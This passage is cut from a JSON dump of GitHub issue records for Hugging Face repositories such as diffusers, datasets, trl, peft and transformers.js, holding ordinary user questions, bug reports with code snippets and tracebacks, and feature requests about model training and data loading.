    "number": 11147,
    "title": "[LTX0.9.5] make LTX0.9.5 works with text-to-video",
    "body": "see more context here https://github.com/huggingface/diffusers/issues/11143#issuecomment-2747390564",
    "url": "https://github.com/huggingface/diffusers/issues/11147",
    "state": "closed",
    "labels": [
      "help wanted"
    ],
    "created_at": "2025-03-24T09:56:47Z",
    "updated_at": "2025-04-04T14:43:16Z",
    "comments": 9,
    "user": "yiyixuxu"
  },
  {
    "repo": "huggingface/search-and-learn",
    "number": 47,
    "title": "How to run this project on CPU?",
    "body": "Hello, I'm going to run the code for the project on cpu\n\nThe graphics card I have now is 4060ti, but even with the lightest option (minimum batch size, use 1.5B model, etc.), I couldn't run the project due to memory capacity issues\n\nSo I want to move this project to cpu and see the results even if it takes some time\n\nHowever, even though all settings and codes have been checked, the flash attention backend is automatically set and we are having trouble solving the error\n\nSo I would like to ask if this project cannot be implemented in cpu through vllm setting change only",
    "url": "https://github.com/huggingface/search-and-learn/issues/47",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-24T01:13:44Z",
    "updated_at": "2025-03-24T01:13:44Z",
    "user": "pss0204"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7473,
    "title": "Webdataset data format problem",
    "body": "### Describe the bug\n\nPlease see https://huggingface.co/datasets/ejschwartz/idioms/discussions/1\n\nError code: FileFormatMismatchBetweenSplitsError\n\nAll three splits, train, test, and validation, use webdataset. But only the train split has more than one file. How can I force the other two splits to also be interpreted as being the webdataset format?  (I don't think there is currently a way, but happy to be told that I am wrong.)\n\n### Steps to reproduce the bug\n\n```\nimport datasets\ndatasets.load_dataset(\"ejschwartz/idioms\")\n\n### Expected behavior\n\nThe dataset loads.  Alternatively, there is a YAML syntax for manually specifying the format.\n\n### Environment info\n\n- `datasets` version: 3.2.0\n- Platform: Linux-6.8.0-52-generic-x86_64-with-glibc2.35\n- Python version: 3.10.12\n- `huggingface_hub` version: 0.28.1\n- PyArrow version: 19.0.0\n- Pandas version: 2.2.3\n- `fsspec` version: 2024.9.0",
    "url": "https://github.com/huggingface/datasets/issues/7473",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-21T17:23:52Z",
    "updated_at": "2025-03-21T19:19:58Z",
    "comments": 1,
    "user": "edmcman"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7470,
    "title": "Is it possible to shard a single-sharded IterableDataset?",
    "body": "I thought https://github.com/huggingface/datasets/pull/7252 might be applicable but looking at it maybe not.\n\nSay we have a process, eg. a database query, that can return data in slightly different order each time. So, the initial query needs to be run by a single thread (not to mention running multiple times incurs more cost too). But the results are also big enough that we don't want to materialize it entirely and instead stream it with an IterableDataset.\n\nBut after we have the results we want to split it up across workers to parallelize processing.\n\nIs something like this possible to do?\n\nHere's a failed attempt. The end result should be that each of the shards has unique data, but unfortunately with this attempt the generator gets run once in each shard and the results end up with duplicates...\n\n```\nimport random\nimport datasets\n\n\ndef gen():\n  print('RUNNING GENERATOR!')\n  items = list(range(10))\n  random.shuffle(items)\n  yield from items\n\n\nds = datasets.IterableDataset.from_generator(gen)\n\nprint('dataset contents:')\nfor item in ds:\n  print(item)\nprint()\n\nprint('dataset contents (2):')\nfor item in ds:\n  print(item)\nprint()\n\n\nnum_shards = 3\n\n\ndef sharded(shard_id):\n  for i, example in enumerate(ds):\n    if i % num_shards in shard_id:\n      yield example\n\n\nds1 = datasets.IterableDataset.from_generator(\n  sharded, gen_kwargs={'shard_id': list(range(num_shards))}\n)\n\nfor shard in range(num_shards):\n  print('shard', shard)\n  for item in ds1.shard(num_shards, shard):\n    print(item)\n```",
    "url": "https://github.com/huggingface/datasets/issues/7470",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-21T04:33:37Z",
    "updated_at": "2025-11-22T07:55:43Z",
    "comments": 6,
    "user": "jonathanasdf"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 884,
    "title": "[Question] Support of PointCloud",
    "body": "Hi,  \n\nI'm currently developing a plugin for lerobot and would like to know if there are any plans to support PointCloud data.  \nAdditionally, I'd like to ask if there is a recommended storage format for handling PointCloud data within the project.  \n\nLooking forward to your response.  \n\nThanks",
    "url": "https://github.com/huggingface/lerobot/issues/884",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-03-21T04:29:15Z",
    "updated_at": "2025-10-07T02:26:39Z",
    "user": "yilin404"
  },
  {
    "repo": "huggingface/inference-benchmarker",
    "number": 4,
    "title": "Can i use local model's tokenizer and local dataset?",
    "body": "Hello, may I specify the paths of the locally downloaded model and dataset through the ./inference-benchmarker command, instead of accessing Hugging Face via the network?",
    "url": "https://github.com/huggingface/inference-benchmarker/issues/4",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-21T01:55:03Z",
    "updated_at": "2025-03-27T18:44:04Z",
    "user": "handsome-chips"
  },
  {
    "repo": "huggingface/video-dataset-scripts",
    "number": 20,
    "title": "parquet file how to convert to Training Dataset Format for finetrainers",
    "body": "parquet file how to convert to Training Dataset Format for finetrainers ?",
    "url": "https://github.com/huggingface/video-dataset-scripts/issues/20",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-20T16:22:39Z",
    "updated_at": "2025-04-10T17:46:06Z",
    "user": "kanghua309"
  },
  {
    "repo": "huggingface/trl",
    "number": 3114,
    "title": "What is the reason for using only one GPU when integration with llm?",
    "body": "At [line](https://github.com/huggingface/trl/blob/main/trl/trainer/grpo_trainer.py#L507)  of the code, when using vllm, a unique GPU device is specified here. However, in fact, it is quite common to use a single vllm instance with multiple GPUs. \n\n1. What is the reason that the code is designed to only select a single GPU? \n2. Where does the '**device**' parameter of this LLM interface eventually get passed to? When I entered this function, I couldn't find the corresponding parameter processing method (this might be a very basic question). \n3. When I changed the '**device**' parameter to **tensor_parallel_size** (and also set the world_size and other parameters), an error occurred. \n\nI've noticed that some other PRs have made modifications to the multi-GPU usage of vllm, but not at the interface where [LLM is used](https://github.com/huggingface/trl/blob/main/trl/trainer/grpo_trainer.py#L507). I'm curious about the reasons behind this. \n\nIf anyone is willing to answer me, I would be very grateful.",
    "url": "https://github.com/huggingface/trl/issues/3114",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-03-19T16:20:03Z",
    "updated_at": "2025-04-05T17:01:33Z",
    "user": "spencergotowork"
  },
  {
    "repo": "huggingface/smollm",
    "number": 67,
    "title": "How to fine tune smolvlm on OCR",
    "body": "Is there any guid to finet-tune smovlm on OCR like in https://huggingface.co/ds4sd/SmolDocling-256M-preview ",
    "url": "https://github.com/huggingface/smollm/issues/67",
    "state": "open",
    "labels": [
      "Image"
    ],
    "created_at": "2025-03-19T14:17:33Z",
    "updated_at": "2025-07-29T13:09:05Z",
    "user": "abdelkareemkobo"
  },
  {
    "repo": "huggingface/peft",
    "number": 2436,
    "title": "Fine-tuning with Multiple LoRAs",
    "body": "Thanks for your valuable work!\n\nI would like to know if it's possible to jointly train two LoRAs while only loading one base model. The overall output depends on the respective outputs of LoRA1 and LoRA2. For example, logits1 is obtained from the base model with LoRA1, and logits2 is obtained from the base model with LoRA2. I have tried the following code\n\n```python\nmodel.add_adapter(lora_1)\nmodel.add_adapter(lora_2)\nmodel.enable_adapters()\n\nmodel.set_adapter(\"lora_1\")\nlogits1 = model(input_ids).logits # use model with lora1 to get output\nmodel.set_adapter(\"lora_2\")\nlogits2 = model(input_ids).logits # use model with lora2 to get output\nlogits = logits1+logits2\nloss=loss_fct(logits, labels)\nloss.backward()\n```\n\nbut it seems there might be some issues:\n1. Once set_adapter(lora2) is called, LoRA1 no longer receives gradients; \n2. If I modify the source code of set_adapter to make both requires_grad=True, would that be correct? \n\nWhat I'm confused about is, after I execute set_adapter(lora2), does the model perform computations using the base model with LoRA2 (as I hope), or does it use the base model with both LoRA1 and LoRA2 combined?\n\nI'm looking forward to your help! Thank you!",
    "url": "https://github.com/huggingface/peft/issues/2436",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-19T13:49:28Z",
    "updated_at": "2025-07-19T05:45:12Z",
    "comments": 7,
    "user": "xymou"
  },
  {
    "repo": "huggingface/setfit",
    "number": 590,
    "title": "How do I disable requests to huggingface.co:443 after training?",
    "body": "I'm currently evaluating setfit in a proof of concept situation. Unfortunately, I'm working behind a company firewall, where I do not have access to the world wide web, only to company-internal URLs.\n\nThat's a bit annoying in terms of downloading models, but I can work around that. More importantly, it seems there are calls to huggingface.co:443 after the training is done, which obviously cannot succeed due to the blocked internet access.\nThat wouldn't be big problem if the timeout were 1 minute or so, but it seems to be more like 5-10 minutes, which is a lot of time wasted just waiting for the results.\n\nHow can I disable these blocking HTTP requests?\n\nMy minimal training pipeline looks somewhat like this (shortened for readability, especially data loading):\n\n```\nmodel = SetFitModel.from_pretrained(\n    \"/local/path/local-bge-small-en-v1.5\",\n    local_files_only=True,\n    multi_target_strategy=\"multi-output\",\n)\ntrain_dataset, test_dataset = a_bunch_of_loading_and_sampling_code_thats_irrelevant_here()\nargs = TrainingArguments(\n    batch_size=128,\n    num_epochs=10,\n    report_to=None\n)\ntrainer = Trainer(\n    model=model,\n    args=args,\n    train_dataset=train_dataset,\n    metric=\"f1\",\n    callbacks=None,\n    column_mapping={\"column\": \"mapping\"},\n    metric_kwargs={\"average\": \"samples\"}\n)\ntrainer.train()\n```\n\nAfter all training steps are done, I get the following console logs:\n```\nINFO:sentence_transformers.trainer:Saving model checkpoint to checkpoints/checkpoint-258\nINFO:sentence_transformers.SentenceTransformer:Save model to checkpoints/checkpoint-258\nRequest [id]: GET https://huggingface.co/api/models/setfit-test/local-bge-small-en-v1.5 (authenticated: False)\nDEBUG:huggingface_hub.utils._http:Request [id]: GET https://huggingface.co/api/models/setfit-test/local-bge-small-en-v1.5 (authenticated: False)\nDEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): huggingface.co:443\n```\nThen nothing happens for about 10 minutes, before I get a \"Batches: 100% [tqdm progress bar]\", which is however finished almost immediately.\n\n\n\nIs there any parameter I can set to disable this call to huggingface? \"report_to=None\" or \"callbacks=None\" don't seem to do the trick.",
    "url": "https://github.com/huggingface/setfit/issues/590",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-19T08:42:12Z",
    "updated_at": "2025-03-19T18:44:12Z",
    "user": "AdrianSchneble"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11114,
    "title": "channel inconsistency in cogvideo Lora training example",
    "body": "### Describe the bug\n\nwhile using the training script in (https://github.com/huggingface/diffusers/blob/main/examples/cogvideo/train_cogvideox_image_to_video_lora.py)\n\nI made a dataset as described in readme and run training.\n\nbut a bug occurred at the forward pass process.It is because the model in-channel is 16 but model_input in-channel is 32.\n\nhow can i fix it?\n\n### Reproduction\n\n                # Sample noise that will be added to the latents\n                noise = torch.randn_like(video_latents)\n\n                # Add noise to the model input according to the noise magnitude at each timestep\n                # (this is the forward diffusion process)\n                noisy_video_latents = scheduler.add_noise(video_latents, noise, timesteps)\n                noisy_model_input = torch.cat([noisy_video_latents, image_latents], dim=2)\n\n                # Prepare rotary embeds\n                image_rotary_emb = (\n                    prepare_rotary_positional_embeddings(\n                        height=args.height,\n                        width=args.width,\n                        num_frames=num_frames,\n                        vae_scale_factor_spatial=vae_scale_factor_spatial,\n                        patch_size=model_config.patch_size,\n                        attention_head_dim=model_config.attention_head_dim,\n                        device=accelerator.device,\n                    )\n                    if model_config.use_rotary_positional_embeddings\n                    else None\n                )\n# Predict the noise residual\n                model_output = transformer(\n                    hidden_states=noisy_model_input,\n                    encoder_hidden_states=prompt_embeds,\n                    timestep=timesteps,\n                    image_rotary_emb=image_rotary_emb,\n                    return_dict=False,\n                )[0]\n\n### Logs\n\n```shell\n[rank0]: File \"train_cogvideox_i_t2v_lora_raw.py\", line 1426, in main\n[rank0]: model_output = transformer(\n[rank0]: ^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\n[rank0]: return self._call_impl(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\n[rank0]: return forward_call(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/parallel/distributed.py\", line 1643, in forward\n[rank0]: else self._run_ddp_forward(*inputs, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/parallel/distributed.py\", line 1459, in _run_ddp_forward\n[rank0]: return self.module(*inputs, **kwargs) # type: ignore[index]\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\n[rank0]: return self._call_impl(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\n[rank0]: return forward_call(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File 
\"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/accelerate/utils/operations.py\", line 819, in forward\n[rank0]: return model_forward(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/accelerate/utils/operations.py\", line 807, in __call__\n[rank0]: return convert_to_fp32(self.model_forward(*args, **kwargs))\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/amp/autocast_mode.py\", line 44, in decorate_autocast\n[rank0]: return func(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/diffusers/models/transformers/cogvideox_transformer_3d.py\", line 476, in forward\n[rank0]: hidden_states = self.patch_embed(encoder_hidden_states, hidden_states)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1736, in _wrapped_call_impl\n[rank0]: return self._call_impl(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/torch/nn/modules/module.py\", line 1747, in _call_impl\n[rank0]: return forward_call(*args, **kwargs)\n[rank0]: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[rank0]: File \"/share/home/u21012/.conda/envs/snvds/lib/python3.11/site-packages/diffusers/models/embeddings.py\", line 715, in forward\n[rank0]: image",
    "url": "https://github.com/huggingface/diffusers/issues/11114",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-03-19T07:55:00Z",
    "updated_at": "2025-04-18T15:02:52Z",
    "comments": 2,
    "user": "MrTom34"
  },
  {
    "repo": "huggingface/trl",
    "number": 3109,
    "title": "where is file https://github.com/huggingface/trl/blob/main/trl/scripts/sft.py",
    "body": "### Reproduction\n\n```python\nfrom trl import ...\n\n```\n\noutputs:\n\n```\nTraceback (most recent call last):\n  File \"example.py\", line 42, in \n    ...\n```\n\n\n### System Info\n\nhttps://github.com/huggingface/trl/blob/main/trl/scripts/sft.py\n\n### Checklist\n\n- [x] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [x] I have included my system information\n- [x] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any traceback provided is complete",
    "url": "https://github.com/huggingface/trl/issues/3109",
    "state": "closed",
    "labels": [
      "\ud83d\udc1b bug",
      "\ud83c\udfcb SFT"
    ],
    "created_at": "2025-03-19T02:20:26Z",
    "updated_at": "2025-03-19T02:22:23Z",
    "user": "zh794390558"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1245,
    "title": "QuestionAnsweringOutput does not return start/end index",
    "body": "### Question\n\nQuestion/Answering pipeline does not seem to return start/end index.\n\nconsole output example\n\n``` { answer: 'anywhere', score: 0.8719829671013909 }```\n\nsource code in pipeline.js\n``` \nclass QuestionAnsweringPipeline ...\n\n// TODO add start and end?\n// NOTE: HF returns character index\n                toReturn.push({\n                    answer, score\n                });```\n",
    "url": "https://github.com/huggingface/transformers.js/issues/1245",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-18T21:20:25Z",
    "updated_at": "2025-03-18T21:20:25Z",
    "user": "sleep9"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1243,
    "title": "Transformer.js compatibility with Angular17",
    "body": "### Question\n\nI want to add transformer.js in Angular 17 project. Getting several errors can some one guide me how to add transformer.js with Angular project",
    "url": "https://github.com/huggingface/transformers.js/issues/1243",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-18T16:15:30Z",
    "updated_at": "2025-03-24T21:27:11Z",
    "user": "AnuragPant01"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11108,
    "title": "Is there a way to generate a single image using multiple GPUs?",
    "body": "This is related to #2977 and #3392, but I would like to know how to generate a single image using multiple GPUs. If such a method does not exist, I would also like to know if Accelerate's [Memory-efficient pipeline parallelism](https://huggingface.co/docs/accelerate/usage_guides/distributed_inference#memory-efficient-pipeline-parallelism-experimental) can be applied to this.",
    "url": "https://github.com/huggingface/diffusers/issues/11108",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-18T13:43:05Z",
    "updated_at": "2025-05-02T21:00:31Z",
    "comments": 12,
    "user": "suzukimain"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 876,
    "title": "Multiple GPU Training Support",
    "body": "Hi, lerobot team!\n\nThanks for the great work and organized content.\n\nAre there plans to support PyTorch's Distributed Data Parallel (DDP) training in this framework? ",
    "url": "https://github.com/huggingface/lerobot/issues/876",
    "state": "closed",
    "labels": [
      "enhancement",
      "question",
      "stale"
    ],
    "created_at": "2025-03-18T12:44:43Z",
    "updated_at": "2025-10-07T02:26:45Z",
    "user": "kingchou007"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 521,
    "title": "How to use my own dataset in sft?",
    "body": "Could you please give an instruction/demo on how to use my own dataset (any column name) to apply sft?",
    "url": "https://github.com/huggingface/open-r1/issues/521",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-18T11:38:19Z",
    "updated_at": "2025-03-18T14:21:36Z",
    "user": "dongdongzhaoUP"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11103,
    "title": "Which repo should I use for LTX-Video 0.9.5 diffusers",
    "body": "I see the changes are merged\n\nChecked repo and it is empty\nhttps://huggingface.co/Lightricks/LTX-Video-0.9.5/tree/main\n\nNoticed in test pipeline it is \nrepo = \"YiYiXu/ltx-95\"\n\nSo can I safely assume that the above can be used?\n\n\n@yiyixuxu ",
    "url": "https://github.com/huggingface/diffusers/issues/11103",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-18T10:50:41Z",
    "updated_at": "2025-03-18T11:00:34Z",
    "comments": 2,
    "user": "nitinmukesh"
  },
  {
    "repo": "huggingface/trl",
    "number": 3103,
    "title": "How are Lora parameters used in VLLM generation? (_move_model_to_vllm in GRPO trainer)",
    "body": "From the following code does not see the process of moving lora training parameters to VLLM? How guarantee that generated with the latest parameters? Can someone help explain.\n\"Image\"\n\nAnd I printed the vllm loaded model, and I didn't see LORA-related parameters either.\n\"Image\"\n\nMore, LORARequest was also not seen in the generation calls\n\"Image\"\n",
    "url": "https://github.com/huggingface/trl/issues/3103",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\u26a1 PEFT"
    ],
    "created_at": "2025-03-18T09:24:48Z",
    "updated_at": "2025-03-24T18:32:19Z",
    "user": "cuiyuhao1996"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7457,
    "title": "Document the HF_DATASETS_CACHE env variable",
    "body": "### Feature request\n\nHello,\n\nI have a use case where my team is sharing models and dataset in shared directory to avoid duplication.\nI noticed that the [cache documentation for datasets](https://huggingface.co/docs/datasets/main/en/cache) only mention the `HF_HOME` environment variable but never the `HF_DATASETS_CACHE`.\n\nIt should be nice to add `HF_DATASETS_CACHE` to datasets documentation if it's an intended feature.\nIf it's not, I think a depreciation warning would be appreciated.\n\n### Motivation\n\nThis variable is fully working and similar to what `HF_HUB_CACHE` does for models, so it's nice to know that this exists. This seems to be a quick change to implement.\n\n### Your contribution\n\nI could contribute since this is only affecting a small portion of the documentation",
    "url": "https://github.com/huggingface/datasets/issues/7457",
    "state": "closed",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-03-17T12:24:50Z",
    "updated_at": "2025-05-06T15:54:39Z",
    "comments": 4,
    "user": "LSerranoPEReN"
  },
  {
    "repo": "huggingface/transformers",
    "number": 36762,
    "title": "When what needs to be loaded is in the cache directory, there is no need to make a request to the remote",
    "body": "### Feature request\n\nWhen what needs to be loaded is in the cache directory, there is no need to make a request to the remote.\n\n\n\n### Motivation\n\nI noticed that when `AutoTokenizer` loads a file using `from_pretrained`, it first tries to load it from a cached directory when `pretrained_model_name_or_path` is a model_id (such as gpt2).\n\nHowever, `commit_hash` is `None` by default, e.g. `AutoTokenizer` will call `get_tokenizer_config` to load the configuration file, where the code to get `commit_hash` is: `commit_hash = kwargs.get(\"_commit_ hash\u201d, None)`. \n\nSince it is None, the `cached_file` method doesn't know where the corresponding file is actually stored, so it uses the `hf_hub_download` method to request the corresponding `commit_hash` first. \nAlthough this request is very simple and infrequent, **in offline environments (e.g., a company or school intranet that does not allow access to the extranet), it will report an error.**\n\nI know I can copy files from the cache to my project directory, but the host is usually used by multiple people, which means it may have to be copied many times, which defeats the purpose of using a cached directory in the first place.\n\n### Your contribution\n\n**I suggest changing `commit_hash = kwargs.get(\u201c_commit_hash\u201d, None)` to `commit_hash = kwargs.get(\u201c_commit_hash\u201d, \u201cmain\u201d)`**.",
    "url": "https://github.com/huggingface/transformers/issues/36762",
    "state": "closed",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-03-17T11:20:24Z",
    "updated_at": "2025-03-19T15:49:04Z",
    "user": "JinFish"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11086,
    "title": "RuntimeError after using apply_group_offloading on diffusers: Input type (torch.cuda.FloatTensor) and weight type (torch.FloatTensor) should be the same",
    "body": "Can anyone help me?\nI used WanX's diffusers and used apply_group_offloading according to url: https://huggingface.co/docs/diffusers/main/en/optimization/memory. \nThe code is as follows:\n```\nimage_encoder = CLIPVisionModel.from_pretrained(local_model_path, subfolder=\"image_encoder\", torch_dtype=torch.float32)\nvae = AutoencoderKLWan.from_pretrained(local_model_path, subfolder=\"vae\", torch_dtype=torch.float32)\nscheduler_b = UniPCMultistepScheduler(prediction_type=\"flow_prediction\", use_flow_sigmas=True, flow_shift=5.0)\npipe = WanImageToVideoPipeline.from_pretrained(local_model_path, vae=vae, image_encoder=image_encoder, scheduler=scheduler_b, torch_dtype=torch.bfloat16)\npipe.transformer.enable_group_offload(onload_device=torch.device(\"cuda\"), offload_device=torch.device(\"cpu\"), offload_type=\"block_level\", num_blocks_per_group=1, use_stream=True)\napply_group_offloading(pipe.text_encoder, onload_device=torch.device(\"cuda\"), offload_type=\"block_level\", num_blocks_per_group=1, use_stream=True)\napply_group_offloading(pipe.vae, onload_device=torch.device(\"cuda\"), offload_type=\"block_level\", num_blocks_per_group=1, use_stream=True)\napply_group_offloading(pipe.image_encoder, onload_device=torch.device(\"cuda\"), offload_type=\"block_level\", num_blocks_per_group=1, use_stream=True)\n```\n\nThen print the device information:\n`Before apply_offload:\ntext_encoder device: cpu\ntransformer device: cpu\nvae device: cpu\nimage_encoder device: cpu\nstart to group_offload_block_1_stream\nAfter apply_offload:\ntext_encoder device: cpu\ntransformer device: cpu\nvae device: cpu\nimage_encoder device: cpu`\n\nFinally, an exception is thrown:\n`    return F.conv3d(\n           ^^^^^^^^^\nRuntimeError: Input type (torch.cuda.FloatTensor) and weight type (torch.FloatTensor) should be the same`\n\nDoes anyone know how to fix this? Thanks a lot.",
    "url": "https://github.com/huggingface/diffusers/issues/11086",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-17T11:03:48Z",
    "updated_at": "2025-04-16T15:03:36Z",
    "comments": 5,
    "user": "tiga-dudu"
  },
  {
    "repo": "huggingface/trl",
    "number": 3093,
    "title": "How to use a custom function as the reward model for PPO training",
    "body": "The new version of TRL's PPOtrainer requires Module as the reward model, but I need a custom function calculation to calculate the reward. I tried to lower the TRL version to 0.11.4, but the old version does not seem to support the peft model. I get the following error:\nValueError: model must be a PreTrainedModelWrapper, got  - supported architectures are: (, )\nHowever, I see the is_peft_model parameter in PPOConfig, but there is no such parameter as peft_config in PPOTrainer\nSo I am very troubled now. Is there a good brother who can help me?\n",
    "url": "https://github.com/huggingface/trl/issues/3093",
    "state": "open",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb PPO",
      "\u26a1 PEFT"
    ],
    "created_at": "2025-03-16T09:02:25Z",
    "updated_at": "2025-03-20T10:33:02Z",
    "user": "JWQZ"
  },
  {
    "repo": "huggingface/ai-deadlines",
    "number": 19,
    "title": "How to know the rankings of a conference?",
    "body": "@NielsRogge, may I know where we can get the conference rankings?",
    "url": "https://github.com/huggingface/ai-deadlines/issues/19",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-15T18:32:34Z",
    "updated_at": "2025-03-15T21:45:02Z",
    "user": "julurisaichandu"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11063,
    "title": "prepare_attention_mask - incorrect padding?",
    "body": "### Describe the bug\n\nI'm experimenting with attention masking in Stable Diffusion (so that padding tokens aren't considered for cross attention), and I found that UNet2DConditionModel doesn't work when given an `attention_mask`.\n\nhttps://github.com/huggingface/diffusers/blob/8ead643bb786fe6bc80c9a4bd1730372d410a9df/src/diffusers/models/attention_processor.py#L740\n\nFor the attn1 blocks (self-attention), the target sequence length is different from the current length (target 4096, but it's only 77 for a typical CLIP output). The padding routine pads by *adding* `target_length` zeros to the end of the last dimension, which results in a sequence length of 4096 + 77, rather than the desired 4096. I think it should be:\n\n```diff\n- attention_mask = F.pad(attention_mask, (0, target_length), value=0.0)\n+ attention_mask = F.pad(attention_mask, (0, target_length - current_length), value=0.0)\n```\n\n`encoder_attention_mask` works fine  - it's passed to the attn2 block and no padding ends up being necessary.\n\nIt seems that this would additionally fail if current_length were greater than target_length, since you can't pad by a negative amount, but I don't know that that's a practical concern.\n\n(I know that particular masking isn't even semantically valid, but that's orthogonal to this issue!)\n\n### Reproduction\n\n```python\n# given a Stable Diffusion pipeline\n# given te_mask = tokenizer_output.attention_mask\npipeline.unet(latent_input, timestep, text_encoder_output, attention_mask=te_mask).sample\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.33.0.dev0\n- Platform: Linux-6.8.0-55-generic-x86_64-with-glibc2.39\n- Running on Google Colab?: No\n- Python version: 3.10.11\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.28.1\n- Transformers version: 4.48.3\n- Accelerate version: 1.3.0\n- PEFT version: not installed\n- Bitsandbytes version: 0.45.2\n- Safetensors version: 0.5.2\n- xFormers version: 0.0.29.post2\n- Accelerator: NVIDIA GeForce RTX 3060, 12288 MiB\nNVIDIA GeForce RTX 4060 Ti, 16380 MiB\n- Using GPU in script?: \n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11063",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-03-14T19:01:01Z",
    "updated_at": "2025-04-14T15:03:14Z",
    "comments": 2,
    "user": "cheald"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1237,
    "title": "Using pipeline API in Mobile Devices",
    "body": "### Question\n\nHow can I do the pipeline running in mobile devices?\n\nLike here:\npipeline('background-removal', 'briaai/RMBG-1.4', { device: \"webgpu\" })\n\nOr it depends from the model avaliable?\n\nI don't find documentations about pipeline API options, like 'device' and others params...",
    "url": "https://github.com/huggingface/transformers.js/issues/1237",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-14T17:55:27Z",
    "updated_at": "2025-05-11T19:58:39Z",
    "user": "LuSrodri"
  },
  {
    "repo": "huggingface/autotrain-advanced",
    "number": 869,
    "title": "How to fine-tune a custom model for Ollama?",
